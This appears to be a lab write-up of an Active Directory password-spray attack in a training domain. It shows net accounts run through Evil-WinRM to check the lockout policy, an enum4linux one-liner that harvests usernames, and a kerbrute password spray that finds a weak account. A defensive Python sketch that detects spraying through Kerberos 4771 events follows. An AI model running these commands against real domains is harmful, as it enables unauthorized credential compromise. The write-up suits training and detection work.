Enum
I tried running net.exe commands, but most of them failed due to a lack of privileges.
But we know that there is a user with a weak password. So our goal is to first enumerate the usernames and then perform a password spray attack. Before that, we need to check the password policy so we don't get accounts locked out.
*Evil-WinRM* PS C:\Users\AB920\Documents> net accounts
Force user logoff how long after time expires?: Never
Minimum password age (days): 0
Maximum password age (days): 42
Minimum password length: 1
Length of password history maintained: None
Lockout threshold: Never
Lockout duration (minutes): 30
Lockout observation window (minutes): 30
Computer role: SERVER
The command completed successfully.

As we can see, there is no lockout threshold. So now we enumerate the users:

enum4linux -U -u $username -p $password 172.16.7.3 | grep "user:" | cut -f2 -d"[" | cut -f1 -d"]" > usernames.txt

With this username list, we can now run the password spray:

kerbrute passwordspray -d inlanefreight.local --dc 172.16.7.3 usernames.txt pass_list.txt

We got a user named BR086.
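
Because the policy above has no lockout threshold, a spray like this never locks an account, so the defender's signal is a single source failing Kerberos pre-authentication against many accounts. The following detection sketch is an added example, not part of the original write-up: it looks for Security event 4771 with status 0x18 (pre-authentication failed); the log line layout, IP addresses, account names and thresholds are constructed assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records (not from the page).
# Assumed layout: timestamp, event ID, account, client IP, Kerberos status.
SAMPLE_EVENTS = """\
2024-01-10T09:00:01 4771 user01 10.0.0.50 0x18
2024-01-10T09:00:01 4771 user02 10.0.0.50 0x18
2024-01-10T09:00:02 4771 user03 10.0.0.50 0x18
2024-01-10T09:00:02 4771 user04 10.0.0.50 0x18
2024-01-10T09:00:03 4768 user05 10.0.0.50 0x0
2024-01-10T09:00:03 4771 user06 10.0.0.50 0x18
2024-01-10T09:05:10 4771 user07 10.0.0.77 0x18
2024-01-10T09:05:40 4771 user07 10.0.0.77 0x18
2024-01-10T09:06:15 4771 user07 10.0.0.77 0x18
"""

def parse_events(text):
    """Turn the assumed whitespace-separated export into typed tuples."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, event_id, account, source, status = line.split()
        events.append((datetime.fromisoformat(ts), int(event_id),
                       account.lower(), source, status.lower()))
    return events

def detect_spray(events, window=timedelta(minutes=5), min_accounts=5):
    """Flag sources with 4771/0x18 failures on >= min_accounts accounts in one window."""
    by_source = defaultdict(list)
    for ts, event_id, account, source, status in events:
        if event_id == 4771 and status == "0x18":
            by_source[source].append((ts, account))
    flagged = {}
    for source, failures in by_source.items():
        failures.sort()
        start = 0
        for end in range(len(failures)):
            # Slide the window start forward until it spans at most `window`.
            while failures[end][0] - failures[start][0] > window:
                start += 1
            accounts = {acct for _, acct in failures[start:end + 1]}
            if len(accounts) >= min_accounts:
                flagged[source] = sorted(accounts)
                break
    return flagged

if __name__ == "__main__":
    print(detect_spray(parse_events(SAMPLE_EVENTS)))
```

A user retyping one password (10.0.0.77 in the sample) stays below the threshold because the rule counts distinct accounts per source, not raw failures.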